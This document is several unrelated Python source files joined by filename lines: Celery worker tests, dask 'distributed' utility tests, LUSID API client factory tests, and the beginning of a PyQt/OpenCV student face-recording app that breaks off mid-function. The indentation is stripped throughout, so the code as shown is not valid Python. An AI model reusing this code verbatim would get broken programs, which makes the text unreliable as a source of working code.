send_events=False, init_callback=init_callback)
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.qos = _QoS()
l.connection = BrokerConnection()
l.iterations = 0
def raises_KeyError(limit=None):
l.iterations += 1
if l.qos.prev != l.qos.value:
l.qos.update()
if l.iterations >= 2:
raise KeyError("foo")
l.consume_messages = raises_KeyError
with self.assertRaises(KeyError):
l.start()
self.assertTrue(init_callback.call_count)
self.assertEqual(l.iterations, 1)
self.assertEqual(l.qos.prev, l.qos.value)
init_callback.reset_mock()
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.qos = _QoS()
l.task_consumer = Mock()
l.broadcast_consumer = Mock()
l.connection = BrokerConnection()
l.consume_messages = Mock(side_effect=socket.error("foo"))
with self.assertRaises(socket.error):
l.start()
self.assertTrue(init_callback.call_count)
self.assertTrue(l.consume_messages.call_count)
def test_reset_connection_with_no_node(self):
l = MainConsumer(self.ready_queue, self.eta_schedule, self.logger)
self.assertEqual(None, l.pool)
l.reset_connection()
class test_WorkController(AppCase):
def setup(self):
self.worker = self.create_worker()
def create_worker(self, **kw):
worker = WorkController(concurrency=1, loglevel=0, **kw)
worker._shutdown_complete.set()
worker.logger = Mock()
return worker
@patch("celery.platforms.signals")
@patch("celery.platforms.set_mp_process_title")
def test_process_initializer(self, set_mp_process_title, _signals):
from celery import Celery
from celery import signals
from celery.app import _tls
from celery.concurrency.processes import process_initializer
from celery.concurrency.processes import (WORKER_SIGRESET,
WORKER_SIGIGNORE)
def on_worker_process_init(**kwargs):
on_worker_process_init.called = True
on_worker_process_init.called = False
signals.worker_process_init.connect(on_worker_process_init)
loader = Mock()
app = Celery(loader=loader, set_as_current=False)
app.conf = AttributeDict(DEFAULTS)
process_initializer(app, "awesome.worker.com")
self.assertIn((tuple(WORKER_SIGIGNORE), {}),
_signals.ignore.call_args_list)
self.assertIn((tuple(WORKER_SIGRESET), {}),
_signals.reset.call_args_list)
self.assertTrue(app.loader.init_worker.call_count)
self.assertTrue(on_worker_process_init.called)
self.assertIs(_tls.current_app, app)
set_mp_process_title.assert_called_with("celeryd",
hostname="awesome.worker.com")
def test_with_rate_limits_disabled(self):
worker = WorkController(concurrency=1, loglevel=0,
disable_rate_limits=True)
self.assertTrue(hasattr(worker.ready_queue, "put"))
def test_attrs(self):
worker = self.worker
self.assertIsInstance(worker.scheduler, Timer)
self.assertTrue(worker.scheduler)
self.assertTrue(worker.pool)
self.assertTrue(worker.consumer)
self.assertTrue(worker.mediator)
self.assertTrue(worker.components)
def test_with_embedded_celerybeat(self):
worker = WorkController(concurrency=1, loglevel=0,
embed_clockservice=True)
self.assertTrue(worker.beat)
self.assertIn(worker.beat, worker.components)
def test_with_autoscaler(self):
worker = self.create_worker(autoscale=[10, 3], send_events=False,
eta_scheduler_cls="celery.utils.timer2.Timer")
self.assertTrue(worker.autoscaler)
def test_dont_stop_or_terminate(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.stop()
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate()
self.assertNotEqual(worker._state, worker.CLOSE)
sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False
try:
worker._state = worker.RUN
worker.stop(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
finally:
worker.pool.signal_safe = sigsafe
def test_on_timer_error(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.logger = Mock()
try:
raise KeyError("foo")
except KeyError:
exc_info = sys.exc_info()
worker.on_timer_error(exc_info)
msg, args = worker.logger.error.call_args[0]
self.assertIn("KeyError", msg % args)
def test_on_timer_tick(self):
worker = WorkController(concurrency=1, loglevel=10)
worker.logger = Mock()
worker.timer_debug = worker.logger.debug
worker.on_timer_tick(30.0)
xargs = worker.logger.debug.call_args[0]
fmt, arg = xargs[0], xargs[1]
self.assertEqual(30.0, arg)
self.assertIn("Next eta %s secs", fmt)
def test_process_task(self):
worker = self.worker
worker.pool = Mock()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
self.assertEqual(worker.pool.apply_async.call_count, 1)
worker.pool.stop()
def test_process_task_raise_base(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyboardInterrupt("Ctrl+C")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(KeyboardInterrupt):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_SystemTerminate(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = SystemTerminate()
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
with self.assertRaises(SystemExit):
worker.process_task(task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_regular(self):
worker = self.worker
worker.pool = Mock()
worker.pool.apply_async.side_effect = KeyError("some exception")
backend = Mock()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = Request.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_start_catches_base_exceptions(self):
worker1 = self.create_worker()
stc = Mock()
stc.start.side_effect = SystemTerminate()
worker1.components = [stc]
worker1.start()
self.assertTrue(stc.terminate.call_count)
worker2 = self.create_worker()
sec = Mock()
sec.start.side_effect = SystemExit()
sec.terminate = None
worker2.components = [sec]
worker2.start()
self.assertTrue(sec.stop.call_count)
def test_state_db(self):
from celery.worker import state
Persistent = state.Persistent
state.Persistent = Mock()
try:
worker = self.create_worker(state_db="statefilename")
self.assertTrue(worker._persistence)
finally:
state.Persistent = Persistent
def test_disable_rate_limits_solo(self):
worker = self.create_worker(disable_rate_limits=True,
pool_cls="solo")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertIsNone(worker.mediator)
self.assertEqual(worker.ready_queue.put, worker.process_task)
def test_disable_rate_limits_processes(self):
try:
worker = self.create_worker(disable_rate_limits=True,
pool_cls="processes")
except ImportError:
raise SkipTest("multiprocessing not supported")
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertTrue(worker.mediator)
self.assertNotEqual(worker.ready_queue.put, worker.process_task)
def test_start__stop(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock()]
worker.start()
for w in worker.components:
self.assertTrue(w.start.call_count)
worker.stop()
        for component in worker.components:
            self.assertTrue(component.stop.call_count)
def test_start__terminate(self):
worker = self.worker
worker._shutdown_complete.set()
worker.components = [Mock(), Mock(), Mock(), Mock(), Mock()]
for component in worker.components[:3]:
component.terminate = None
worker.start()
for w in worker.components[:3]:
self.assertTrue(w.start.call_count)
        self.assertEqual(worker._running, len(worker.components))
self.assertEqual(worker._state, RUN)
worker.terminate()
for component in worker.components[:3]:
self.assertTrue(component.stop.call_count)
self.assertTrue(worker.components[4].terminate.call_count)
|
test_utils.py
|
from __future__ import print_function, division, absolute_import
from collections import Iterator
from functools import partial
import io
import logging
import socket
from time import sleep
from threading import Thread
import threading
import traceback
import pytest
from tornado import gen
from tornado.ioloop import IOLoop
from tornado.locks import Event
import dask
from distributed.compatibility import Queue, isqueue, PY2
from distributed.metrics import time
from distributed.utils import (All, sync, is_kernel, ensure_ip, str_graph,
truncate_exception, get_traceback, queue_to_iterator,
iterator_to_queue, _maybe_complex, read_block, seek_delimiter,
funcname, ensure_bytes, open_port)
from distributed.utils_test import (loop, inc, throws, div, captured_handler,
captured_logger, has_ipv6)
def test_All(loop):
@gen.coroutine
def throws():
1 / 0
@gen.coroutine
def slow():
yield gen.sleep(10)
@gen.coroutine
def inc(x):
raise gen.Return(x + 1)
@gen.coroutine
def f():
results = yield All(*[inc(i) for i in range(10)])
assert results == list(range(1, 11))
start = time()
for tasks in [[throws(), slow()], [slow(), throws()]]:
try:
yield All(tasks)
assert False
except ZeroDivisionError:
pass
end = time()
assert end - start < 10
loop.run_sync(f)
def test_sync(loop):
e = Event()
e2 = threading.Event()
@gen.coroutine
def wait_until_event():
e2.set()
yield e.wait()
thread = Thread(target=loop.run_sync, args=(wait_until_event,))
thread.daemon = True
thread.start()
e2.wait()
result = sync(loop, inc, 1)
assert result == 2
loop.add_callback(e.set)
thread.join()
def test_sync_error(loop):
e = Event()
@gen.coroutine
def wait_until_event():
yield e.wait()
thread = Thread(target=loop.run_sync, args=(wait_until_event,))
thread.daemon = True
thread.start()
while not loop._running:
sleep(0.01)
try:
result = sync(loop, throws, 1)
except Exception as exc:
f = exc
assert 'hello' in str(exc)
tb = get_traceback()
L = traceback.format_tb(tb)
assert any('throws' in line for line in L)
def function1(x):
return function2(x)
def function2(x):
return throws(x)
try:
result = sync(loop, function1, 1)
except Exception as exc:
assert 'hello' in str(exc)
tb = get_traceback()
L = traceback.format_tb(tb)
assert any('function1' in line for line in L)
assert any('function2' in line for line in L)
loop.add_callback(e.set)
thread.join()
def test_sync_inactive_loop(loop):
@gen.coroutine
def f(x):
raise gen.Return(x + 1)
y = sync(loop, f, 1)
assert y == 2
def test_is_kernel():
pytest.importorskip('IPython')
assert is_kernel() is False
def test_ensure_ip():
assert ensure_ip('localhost') in ('127.0.0.1', '::1')
assert ensure_ip('123.123.123.123') == '123.123.123.123'
assert ensure_ip('8.8.8.8') == '8.8.8.8'
if has_ipv6():
assert ensure_ip('2001:4860:4860::8888') == '2001:4860:4860::8888'
assert ensure_ip('::1') == '::1'
def test_truncate_exception():
e = ValueError('a'*1000)
assert len(str(e)) >= 1000
f = truncate_exception(e, 100)
assert type(f) == type(e)
assert len(str(f)) < 200
assert 'aaaa' in str(f)
e = ValueError('a')
assert truncate_exception(e) is e
def test_get_traceback():
def a(x):
return div(x, 0)
def b(x):
return a(x)
def c(x):
return b(x)
try:
        c(1)
except Exception as e:
tb = get_traceback()
assert type(tb).__name__ == 'traceback'
def test_queue_to_iterator():
q = Queue()
q.put(1)
q.put(2)
seq = queue_to_iterator(q)
assert isinstance(seq, Iterator)
assert next(seq) == 1
assert next(seq) == 2
def test_iterator_to_queue():
seq = iter([1, 2, 3])
q = iterator_to_queue(seq)
assert isqueue(q)
assert q.get() == 1
def test_str_graph():
dsk = {'x': 1}
assert str_graph(dsk) == dsk
dsk = {('x', 1): (inc, 1)}
assert str_graph(dsk) == {str(('x', 1)): (inc, 1)}
dsk = {('x', 1): (inc, 1), ('x', 2): (inc, ('x', 1))}
assert str_graph(dsk) == {str(('x', 1)): (inc, 1),
str(('x', 2)): (inc, str(('x', 1)))}
dsks = [{'x': 1},
{('x', 1): (inc, 1), ('x', 2): (inc, ('x', 1))},
{('x', 1): (sum, [1, 2, 3]),
('x', 2): (sum, [('x', 1), ('x', 1)])}]
for dsk in dsks:
sdsk = str_graph(dsk)
keys = list(dsk)
skeys = [str(k) for k in keys]
assert all(isinstance(k, str) for k in sdsk)
assert dask.get(dsk, keys) == dask.get(sdsk, skeys)
def test_maybe_complex():
assert not _maybe_complex(1)
assert not _maybe_complex('x')
assert _maybe_complex((inc, 1))
assert _maybe_complex([(inc, 1)])
assert _maybe_complex([(inc, 1)])
assert _maybe_complex({'x': (inc, 1)})
def test_read_block():
delimiter = b'\n'
data = delimiter.join([b'123', b'456', b'789'])
f = io.BytesIO(data)
assert read_block(f, 1, 2) == b'23'
assert read_block(f, 0, 1, delimiter=b'\n') == b'123\n'
assert read_block(f, 0, 2, delimiter=b'\n') == b'123\n'
assert read_block(f, 0, 3, delimiter=b'\n') == b'123\n'
assert read_block(f, 0, 5, delimiter=b'\n') == b'123\n456\n'
assert read_block(f, 0, 8, delimiter=b'\n') == b'123\n456\n789'
assert read_block(f, 0, 100, delimiter=b'\n') == b'123\n456\n789'
assert read_block(f, 1, 1, delimiter=b'\n') == b''
assert read_block(f, 1, 5, delimiter=b'\n') == b'456\n'
assert read_block(f, 1, 8, delimiter=b'\n') == b'456\n789'
for ols in [[(0, 3), (3, 3), (6, 3), (9, 2)],
[(0, 4), (4, 4), (8, 4)]]:
out = [read_block(f, o, l, b'\n') for o, l in ols]
assert b"".join(filter(None, out)) == data
def test_seek_delimiter_endline():
f = io.BytesIO(b'123\n456\n789')
# if at zero, stay at zero
seek_delimiter(f, b'\n', 5)
assert f.tell() == 0
# choose the first block
for bs in [1, 5, 100]:
f.seek(1)
seek_delimiter(f, b'\n', blocksize=bs)
assert f.tell() == 4
# handle long delimiters well, even with short blocksizes
f = io.BytesIO(b'123abc456abc789')
for bs in [1, 2, 3, 4, 5, 6, 10]:
f.seek(1)
seek_delimiter(f, b'abc', blocksize=bs)
assert f.tell() == 6
# End at the end
f = io.BytesIO(b'123\n456')
f.seek(5)
seek_delimiter(f, b'\n', 5)
assert f.tell() == 7
def test_funcname():
def f():
pass
assert funcname(f) == 'f'
assert funcname(partial(f)) == 'f'
assert funcname(partial(partial(f))) == 'f'
def test_ensure_bytes():
data = [b'1', '1', memoryview(b'1'), bytearray(b'1')]
if PY2:
data.append(buffer(b'1'))
for d in data:
result = ensure_bytes(d)
assert isinstance(result, bytes)
assert result == b'1'
def dump_logger_list():
root = logging.getLogger()
loggers = root.manager.loggerDict
print()
print("== Loggers (name, level, effective level, propagate) ==")
def logger_info(name, logger):
return (name, logging.getLevelName(logger.level),
logging.getLevelName(logger.getEffectiveLevel()),
logger.propagate)
infos = []
infos.append(logger_info('<root>', root))
for name, logger in sorted(loggers.items()):
if not isinstance(logger, logging.Logger):
# Skip 'PlaceHolder' objects
continue
assert logger.name == name
infos.append(logger_info(name, logger))
for info in infos:
print("%-40s %-8s %-8s %-5s" % info)
print()
def test_logging():
"""
Test default logging configuration.
"""
d = logging.getLogger('distributed')
assert len(d.handlers) == 1
assert isinstance(d.handlers[0], logging.StreamHandler)
# Work around Bokeh messing with the root logger level
# https://github.com/bokeh/bokeh/issues/5793
root = logging.getLogger('')
old_root_level = root.level
root.setLevel('WARN')
try:
dfb = logging.getLogger('distributed.foo.bar')
f = logging.getLogger('foo')
fb = logging.getLogger('foo.bar')
with captured_handler(d.handlers[0]) as distributed_log:
with captured_logger(root) as foreign_log:
h = logging.StreamHandler(foreign_log)
fmt = '[%(levelname)s in %(name)s] - %(message)s'
h.setFormatter(logging.Formatter(fmt))
fb.addHandler(h)
fb.propagate = False
# For debugging
dump_logger_list()
d.debug("1: debug")
d.info("2: info")
dfb.info("3: info")
fb.info("4: info")
fb.error("5: error")
f.info("6: info")
f.error("7: error")
distributed_log = distributed_log.getvalue().splitlines()
foreign_log = foreign_log.getvalue().splitlines()
# distributed log is configured at INFO level by default
assert distributed_log == [
"distributed - INFO - 2: info",
"distributed.foo.bar - INFO - 3: info",
]
# foreign logs should be unaffected by distributed's logging
# configuration. They get the default ERROR level from logging.
assert foreign_log == [
"[ERROR in foo.bar] - 5: error",
"7: error",
]
finally:
root.setLevel(old_root_level)
def test_open_port():
port = open_port()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', port))
s.close()
|
test_api_client_factory.py
|
import unittest
from collections import UserString
from datetime import datetime
from unittest.mock import patch
from urllib3 import PoolManager, ProxyManager
from parameterized import parameterized
from threading import Thread
from lusid import (InstrumentsApi, ResourceListOfInstrumentIdTypeDescriptor,
TCPKeepAlivePoolManager, TCPKeepAliveProxyManager)
from lusid.utilities import ApiClientFactory
from utilities import TokenUtilities as tu, CredentialsSource
from utilities.temp_file_manager import TempFileManager
from utilities import MockApiResponse
class UnknownApi:
pass
class UnknownImpl:
pass
source_config_details, config_keys = CredentialsSource.fetch_credentials(), CredentialsSource.fetch_config_keys()
class RefreshingToken(UserString):
def __init__(self):
token_data = {"expires": datetime.now(), "current_access_token": ""}
def get_token():
token_data["current_access_token"] = None
return token_data["current_access_token"]
self.access_token = get_token
def __getattribute__(self, name):
token = object.__getattribute__(self, "access_token")()
if name == "data":
return token
return token.__getattribute__(name)
class ApiFactory(unittest.TestCase):
def validate_api(self, api):
result = api.get_instrument_identifier_types()
self.assertIsNotNone(result)
self.assertIsInstance(result, ResourceListOfInstrumentIdTypeDescriptor)
self.assertGreater(len(result.values), 0)
@parameterized.expand([
["Unknown API", UnknownApi, "unknown api: UnknownApi"],
["Unknown Implementation", UnknownImpl, "unknown api: UnknownImpl"]
])
def test_get_unknown_api_throws_exception(self, _, api_to_build, error_message):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
with self.assertRaises(TypeError) as error:
factory.build(api_to_build)
self.assertEqual(error.exception.args[0], error_message)
def test_get_api_with_token(self):
token, refresh_token = tu.get_okta_tokens(CredentialsSource.secrets_path())
factory = ApiClientFactory(
token=token,
api_url=source_config_details["api_url"],
app_name=source_config_details["app_name"]
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_none_token(self):
factory = ApiClientFactory(
token=None,
api_url=source_config_details["api_url"],
app_name=source_config_details["app_name"],
api_secrets_filename=CredentialsSource.secrets_path(),
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_str_none_token(self):
factory = ApiClientFactory(
token=RefreshingToken(),
api_url=source_config_details["api_url"],
app_name=source_config_details["app_name"],
api_secrets_filename=CredentialsSource.secrets_path(),
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_token_url_as_env_var(self):
token, refresh_token = tu.get_okta_tokens(CredentialsSource.secrets_path())
with patch.dict('os.environ', {"FBN_LUSID_API_URL": source_config_details["api_url"]}, clear=True):
factory = ApiClientFactory(
token=token,
app_name=source_config_details["app_name"])
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_configuration(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
def test_get_api_with_info(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
result = api.get_instrument_identifier_types(call_info=lambda r: print(r))
self.assertIsNotNone(result)
def test_get_info_with_invalid_param_throws_error(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
with self.assertRaises(ValueError) as error:
api.get_instrument_identifier_types(call_info="invalid param")
self.assertEqual(error.exception.args[0], "call_info value must be a lambda")
def test_wrapped_method(self):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
wrapped_scopes_api = factory.build(InstrumentsApi)
portfolio = InstrumentsApi(wrapped_scopes_api.api_client)
self.assertEqual(portfolio.__doc__, wrapped_scopes_api.__doc__)
self.assertEqual(portfolio.__module__, wrapped_scopes_api.__module__)
self.assertDictEqual(portfolio.__dict__, wrapped_scopes_api.__dict__)
def test_get_api_with_proxy_file(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
},
"proxy": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" in key
}
}
secrets["api"].pop("clientCertificate", None)
if secrets["proxy"].get("address", None) is None:
self.skipTest(f"missing proxy configuration")
secrets_file = TempFileManager.create_temp_file(secrets)
# Load the config
factory = ApiClientFactory(api_secrets_filename=secrets_file.name)
# Close and thus delete the temporary file
TempFileManager.delete_temp_file(secrets_file)
api = factory.build(InstrumentsApi)
self.validate_api(api)
def test_get_api_with_proxy_config(self):
secrets = {
"api": {
config_keys[key]["config"]: value for key, value in source_config_details.items() if
value is not None and "proxy" not in key
}
}
secrets["api"].pop("clientCertificate", None)
if source_config_details.get("proxy_address", None) is None:
self.skipTest(f"missing proxy configuration")
secrets_file = TempFileManager.create_temp_file(secrets)
# Load the config
with patch.dict('os.environ', {}, clear=True):
factory = ApiClientFactory(
api_secrets_filename=secrets_file.name,
proxy_url=source_config_details["proxy_address"],
proxy_username=source_config_details["proxy_username"],
proxy_password=source_config_details["proxy_password"])
# Close and thus delete the temporary file
TempFileManager.delete_temp_file(secrets_file)
api = factory.build(InstrumentsApi)
self.validate_api(api)
def test_get_api_with_correlation_id_from_env_var(self):
env_vars = {config_keys[key]["env"]: value for key, value in source_config_details.items() if value is not None}
env_vars["FBN_CORRELATION_ID"] = "env-correlation-id"
with patch.dict('os.environ', env_vars, clear=True):
factory = ApiClientFactory()
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
self.assertTrue("CorrelationId" in api.api_client.default_headers, msg="CorrelationId not found in headers")
            self.assertEqual(api.api_client.default_headers["CorrelationId"], "env-correlation-id")
def test_get_api_with_correlation_id_from_param(self):
env_vars = {config_keys[key]["env"]: value for key, value in source_config_details.items() if value is not None}
with patch.dict('os.environ', env_vars, clear=True):
factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path(),
correlation_id="param-correlation-id"
)
api = factory.build(InstrumentsApi)
self.assertIsInstance(api, InstrumentsApi)
self.validate_api(api)
self.assertTrue("CorrelationId" in api.api_client.default_headers, msg="CorrelationId not found in headers")
            self.assertEqual(api.api_client.default_headers["CorrelationId"], "param-correlation-id")
def test_get_api_with_tcp_keep_alive(self):
api_factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path(),
tcp_keep_alive=True
)
# Make sure tcp_keep_alive was passed through all of the layers
self.assertTrue(api_factory.api_client.configuration.tcp_keep_alive)
self.assertIsInstance(api_factory.api_client.rest_client.pool_manager,
(TCPKeepAlivePoolManager, TCPKeepAliveProxyManager))
def test_get_api_without_tcp_keep_alive(self):
api_factory = ApiClientFactory(api_secrets_filename=CredentialsSource.secrets_path())
# Make sure tcp_keep_alive was passed through all of the layers
self.assertFalse(api_factory.api_client.configuration.tcp_keep_alive)
self.assertIsInstance(api_factory.api_client.rest_client.pool_manager, (PoolManager, ProxyManager))
def test_use_apifactory_with_id_provider_response_handler(self):
"""
Ensures that an id_provider_response handler that is passed to the ApiClientFactory can be used during
communication with the id provider (if appropriate).
"""
responses = []
def record_response(id_provider_response):
nonlocal responses
responses.append(id_provider_response.status_code)
api_factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path(),
id_provider_response_handler=record_response
)
api = api_factory.build(InstrumentsApi)
self.validate_api(api)
self.assertGreater(len(responses), 0)
def test_use_apifactory_multiple_threads(self):
access_token = str(ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
).api_client.configuration.access_token)
api_factory = ApiClientFactory(
api_secrets_filename=CredentialsSource.secrets_path()
)
def get_identifier_types(factory):
return factory.build(InstrumentsApi).get_instrument_identifier_types()
thread1 = Thread(target=get_identifier_types, args=[api_factory])
thread2 = Thread(target=get_identifier_types, args=[api_factory])
thread3 = Thread(target=get_identifier_types, args=[api_factory])
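# Stub requests.post (assumed here to be the call the factory uses for the
# token exchange) so the test never hits the network; the call_count
# assertion below then verifies that all three threads share one token fetch.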
with patch("requests.post") as identity_mock:
identity_mock.side_effect = lambda *args, **kwargs: MockApiResponse(
json_data={
"access_token": f"{access_token}",
"refresh_token": "mock_refresh_token",
"expires_in": 3600
},
status_code=200
)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
# Ensure that we only got an access token once
self.assertEqual(1, identity_mock.call_count)
|
dataRecord.py
|
import logging.config
import os
import queue
import sqlite3
import sys
import threading
from datetime import datetime
import cv2
from PyQt5.QtCore import pyqtSignal, QTimer, QRegExp
from PyQt5.QtGui import QIcon, QImage, QPixmap, QTextCursor, QRegExpValidator
from PyQt5.QtWidgets import QWidget, QApplication, QMessageBox, QDialog
from PyQt5.uic import loadUi
# Raised when the user cancels a database update
class OperationCancel(Exception):
pass
# Raised when interference occurs during face capture
class RecordDisturbance(Exception):
pass
# Dialog for entering user information
class UserInfoDialog(QDialog):
def __init__(self):
super(UserInfoDialog, self).__init__()
# Initialize the UI
loadUi('./ui/UserInfoDialog.ui', self)
self.setWindowIcon(QIcon('./icons/icon.png'))
self.setFixedSize(425, 300)
# Use regular expressions to validate user input
# 1. Restrict the student ID field
stu_id_regx = QRegExp('^[0-9]{12}$')
stu_id_validator = QRegExpValidator(stu_id_regx, self.stuIDLineEdit)
self.stuIDLineEdit.setValidator(stu_id_validator)
# 2. Restrict the Chinese name field
cn_name_regx = QRegExp('^[\u4e00-\u9fa5]{1,10}$')
cn_name_validator = QRegExpValidator(cn_name_regx, self.cnNameLineEdit)
self.cnNameLineEdit.setValidator(cn_name_validator)
# 3. Restrict the pinyin (romanized) name field
en_name_regx = QRegExp('^[ A-Za-z]{1,16}$')
en_name_validator = QRegExpValidator(en_name_regx, self.enNameLineEdit)
self.enNameLineEdit.setValidator(en_name_validator)
class DataRecordUI(QWidget):
# Signal used to pass log messages to the UI thread
receiveLogSignal = pyqtSignal(str)
def __init__(self):
super(DataRecordUI, self).__init__()
# Initialize the UI
loadUi('./ui/DataRecord.ui', self)
self.setWindowIcon(QIcon('./icons/icon.png'))
self.setFixedSize(1011, 601)
# OpenCV
self.cap = cv2.VideoCapture()
self.faceCascade = cv2.CascadeClassifier('./haarcascades/haarcascade_frontalface_default.xml')
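# The Haar cascade XML ships with OpenCV distributions; the relative path
# assumes the app is launched from the project root.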
self.logQueue = queue.Queue()  # log queue
# Image capture
self.isExternalCameraUsed = False  # whether an external camera is used
self.useExternalCameraCheckBox.stateChanged.connect(
lambda: self.useExternalCamera(self.useExternalCameraCheckBox)
)  # external-camera checkbox click handler
self.startWebcamButton.toggled.connect(self.startWebcam)  # open-camera button toggle handler
self.startWebcamButton.setCheckable(True)
# Timer
self.timer = QTimer(self)
self.timer.timeout.connect(self.updateFrame)  # refresh the frame on each timer tick
# Face detection
self.isFaceDetectEnabled = False
self.enableFaceDetectButton.toggled.connect(self.enableFaceDetect)  # face-detection button toggle handler
self.enableFaceDetectButton.setCheckable(True)
# Database
self.database = './FaceBase.db'  # database path
self.datasets = './datasets'  # dataset directory
self.isDbReady = False  # whether the database is ready
self.initDbButton.setIcon(QIcon('./icons/warning.png'))
self.initDbButton.clicked.connect(self.initDb)  # init-database button click handler
# User information
self.isUserInfoReady = False  # whether user info has been entered
self.userInfo = {'stu_id': '', 'cn_name': '', 'en_name': ''}  # holds the entered user information
self.addOrUpdateUserInfoButton.clicked.connect(self.addOrUpdateUserInfo)  # add/update-user button click handler
self.migrateToDbButton.clicked.connect(self.migrateToDb)  # sync-to-database button click handler
# Face capture
self.startFaceRecordButton.clicked.connect(
lambda: self.startFaceRecord(self.startFaceRecordButton)
)  # start-face-capture button click handler
self.faceRecordCount = 0  # number of face samples captured so far
self.minFaceRecordCount = 100  # minimum number of face samples required
self.isFaceDataReady = False  # whether the face data set is complete
self.isFaceRecordEnabled = False  # whether capturing is currently enabled
self.enableFaceRecordButton.clicked.connect(self.enableFaceRecord)  # capture-current-frame button click handler
# Logging
self.receiveLogSignal.connect(lambda log: self.logOutput(log))  # bind the receiveLogSignal handler
self.logOutputThread = threading.Thread(target=self.receiveLog, daemon=True)  # background log thread
self.logOutputThread.start()  # start the log thread
# External-camera checkbox click handler
def useExternalCamera(self, useExternalCameraCheckBox):
if useExternalCameraCheckBox.isChecked():
self.isExternalCameraUsed = True
else:
self.isExternalCameraUsed = False
# Open/close camera button handler
def startWebcam(self, status):
if status:  # open the camera
if self.isExternalCameraUsed:
camID = 1
else:
camID = 0
self.cap.open(camID)  # open the selected camera
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)  # set frame width
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)  # set frame height
ret, frame = self.cap.read()  # pre-read one frame
if not ret:  # the read failed
logging.error('无法调用电脑摄像头{}'.format(camID))
self.logQueue.put('Error:初始化摄像头失败')
self.cap.release()  # release the camera
self.startWebcamButton.setIcon(QIcon('./icons/error.png'))
self.startWebcamButton.setChecked(False)
else:  # the read succeeded
self.startWebcamButton.setText('关闭摄像头')
self.enableFaceDetectButton.setEnabled(True)  # enable the face-detection button
self.timer.start(5)  # refresh frames via the timer
self.startWebcamButton.setIcon(QIcon('./icons/success.png'))
else:  # close the camera
if self.cap.isOpened():
if self.timer.isActive():
self.timer.stop()  # stop frame updates
self.cap.release()  # release the camera
self.faceDetectCaptureLabel.clear()
self.faceDetectCaptureLabel.setText('<font color=red>摄像头未开启</font>')  # show "camera off" in the label
self.startWebcamButton.setText('打开摄像头')  # reset the button text
self.enableFaceDetectButton.setEnabled(False)  # disable the face-detection button
self.startWebcamButton.setIcon(QIcon())
# Enable/disable face detection button handler
def enableFaceDetect(self, status):
if self.cap.isOpened():  # the camera must be open
if status:  # enable face detection
self.enableFaceDetectButton.setText('关闭人脸检测')
self.isFaceDetectEnabled = True
else:  # disable face detection
self.enableFaceDetectButton.setText('开启人脸检测')
self.isFaceDetectEnabled = False
# Capture-current-frame button handler
def enableFaceRecord(self):
if not self.isFaceRecordEnabled:
self.isFaceRecordEnabled = True
# Timer callback: continuously refresh the frame
def updateFrame(self):
ret, frame = self.cap.read()  # read one frame
# self.image = cv2.flip(self.image, 1)
if ret:  # the read succeeded
if self.isFaceDetectEnabled:  # face detection is on
detected_frame = self.detectFace(frame)
self.displayImage(detected_frame)  # show the annotated frame
else:
self.displayImage(frame)  # show the raw frame
# Initialize-database button handler
def initDb(self):
conn = sqlite3.connect(self.database)
cursor = conn.cursor()
try:
# Create the face data directory if it does not exist
if not os.path.isdir(self.datasets):
